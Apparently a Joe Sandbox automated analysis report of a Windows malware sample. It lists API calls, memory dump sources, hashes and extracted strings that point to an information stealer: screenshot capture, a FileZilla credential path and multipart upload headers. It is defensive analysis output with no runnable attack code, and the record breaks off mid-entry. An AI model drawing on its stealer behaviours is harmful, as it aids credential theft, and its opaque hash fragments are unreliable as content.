                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                              • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                              • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                              • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 9a%^$M%$Screen.png
                                                              • API String ID: 0-2021954137
                                                              • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                              • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                              • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                              • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                              • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: advapi32.dll$my-global-render.dll
                                                              • API String ID: 1029625771-772900288
                                                              • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                              • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                              • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                              • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ^^4$^^4$~rjz
                                                              • API String ID: 0-2511145224
                                                              • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                              • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                              • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                              • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                              APIs
                                                              • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                                • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharInformationMultiTimeWideZone
                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                              • API String ID: 1123094072-239921721
                                                              • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                              • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                              • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                              • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,2263B8EC,?,0044387B), ref: 004439CB
                                                              • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,2263B8EC,?,0044387B), ref: 004439D2
                                                              • ExitProcess.KERNEL32 ref: 004439E4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                              • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                              • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                              • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                              APIs
                                                              • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentProfile
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2104809126-4050573280
                                                              • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                              • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                              • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                              • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                              • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                              • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                              • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                              • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID:
                                                              • API String ID: 4218353326-0
                                                              • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                              • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                              • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                              • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                              • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                              • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                              • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                              APIs
                                                                • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                              • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,76FCF770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                              • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                              • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                              • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                              • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                              • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                              • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                              • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                              • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                              • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00979F8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Offset: 00979000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_979000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: e98bbdde4d5c380ec7f594f9296c0412966f8781bb79180ba125d396ed871967
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 9F112879A00208EFDB01DF98C985E98BBF5EF48350F05C0A4F9489B362D371EA90DB80
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                              • API String ID: 1659193697-3907602706
                                                              • Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                              • Instruction ID: 9e83f0dfd3f8611c1eddd0fc66168851e42fb5cb147ded4b9c386802d3003e78
                                                              • Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                              • Instruction Fuzzy Hash: D2F207B1D0171A8BDF38AB5889456BEBBB0FB54324F24452AE515FB3D0E3708E449B93
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 008B11AC
                                                              • RtlAllocateHeap.NTDLL(?,00000008,00000028), ref: 008B1752
                                                              • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 008B2461
                                                              • ReleaseDC.USER32(00000000,?), ref: 008B246B
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 008B1B11, 008B1CB2
                                                              • y_B>, xrefs: 008B2494
                                                              • q7 C, xrefs: 008B1A50
                                                              • TT4, xrefs: 008B23AE
                                                              • TT4, xrefs: 008B168C
                                                              • $jRk, xrefs: 008B1632
                                                              • ?, xrefs: 008B283A
                                                              • q7 C, xrefs: 008B1200
                                                              • y_B>, xrefs: 008B1735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap$BitsRelease
                                                              • String ID: $jRk$?$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                              • API String ID: 2392854675-2009061895
                                                              • Opcode ID: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
                                                              • Instruction ID: 81f1d4c0542d77f3467d93ec78a38f4830241697e653dd94809017b3fe2d4a8d
                                                              • Opcode Fuzzy Hash: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
                                                              • Instruction Fuzzy Hash: 96C20275D0021ACBCF28EB98C9996FEBBB4FB14304F60452AE515EF350D7358A81CB96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: Content-Disposition: form-data; name="$A@6e$A@6e$Content-Type: attachment/x-object$RY30$SqDe87817huf871793q74$^^4$^^4$ame=$ilen
                                                              • API String ID: 4218353326-1595699696
                                                              • Opcode ID: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                              • Instruction ID: 2d689a8b6144ae040ff6817911910587bd341415a88b77611baba4cffa878017
                                                              • Opcode Fuzzy Hash: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                              • Instruction Fuzzy Hash: EC72A771D442198BDF18CF98D9855FEBBB0EB14314F24056BE915EB360E3788A858BCB
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strncpy
                                                              • String ID: $jRk$$jRk$3Z@$576xed$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$x_B>$y_B>$y_B>
                                                              • API String ID: 2961919466-2156214959
                                                              • Opcode ID: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                              • Instruction ID: c1f0278ec094f6be02d202c53d620e15fc525e7d6860b659e372b79efda81f17
                                                              • Opcode Fuzzy Hash: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                              • Instruction Fuzzy Hash: 3982DBB1D0051A8BDF28DB68C9451BEB670EB5C310F29662BE505EB360D738DE418B9F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: Content-Disposition: form-data; name="$ &$($:[$SqDe87817huf871793q74
                                                              • API String ID: 4218353326-898291561
                                                              • Opcode ID: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                              • Instruction ID: fda5cd55cfb9f0796932eaeb7ac8b2d4ab06e0c9493bffbe09938a436643aec3
                                                              • Opcode Fuzzy Hash: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                              • Instruction Fuzzy Hash: 7F128DB090560A8BCF18CF58C9901BEBBB1FF54354F24592BE855EB394D7388991CB8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jRk$%appdata%\FileZilla$?$@an($Aan($Aan($Applications/FileZilla$ST4$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$q7 C$y_B>
                                                              • API String ID: 0-3692191384
                                                              • Opcode ID: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
                                                              • Instruction ID: c834a210395cd1aaa017dfc397298b83e931bed22fb6902ca65ec94610472108
                                                              • Opcode Fuzzy Hash: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
                                                              • Instruction Fuzzy Hash: 50C229B1D0021E9BEF24ABEC89425BE7970FB16714F240937E506FAF91E679C9408793
                                                              Strings
                                                              • f3@, xrefs: 00401138
                                                              • y_B>, xrefs: 0040160E
                                                              • y_B>, xrefs: 00401977
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004013F6, 0040145E, 004015A1
                                                              • x_B>, xrefs: 004013B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$f3@$x_B>$y_B>$y_B>
                                                              • API String ID: 0-2726889951
                                                              • Opcode ID: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                              • Instruction ID: 769378b0013e5f891025f4b50e79353ec4a26f3ac52f3a61e025b4fcd72a7191
                                                              • Opcode Fuzzy Hash: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                              • Instruction Fuzzy Hash: 2BC1A1756183019BCB2C8A19C99153EBAE5AB85314F14893FF556EB3F0E338D8419B4B
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
                                                              • API String ID: 4218353326-1811093487
                                                              • Opcode ID: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                              • Instruction ID: 68bed0c00360ed0a45c1e6ce9cbfc25002c960087630870fd3b76e024578c11c
                                                              • Opcode Fuzzy Hash: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                              • Instruction Fuzzy Hash: D662D3B1D402198BCF24CB98C9856BEBBB0EB18305F24251BD595FB350D33CCA518BAB
                                                              Strings
                                                              • y_B>, xrefs: 004285E3
                                                              • ST4, xrefs: 00428386
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00428A0D, 00428C49
                                                              • $jRk, xrefs: 0042848F
                                                              • TT4, xrefs: 0042970A
                                                              • $jRk, xrefs: 0042906E
                                                              • q7 C, xrefs: 004292BF
                                                              • q7 C, xrefs: 00428AB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jRk$$jRk$ST4$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$q7 C$q7 C$y_B>
                                                              • API String ID: 0-2767669607
                                                              • Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                              • Instruction ID: 5ed2bce57202caa61740e9a0066a193a3aa364e15e010ca0d77f5b321bac14a1
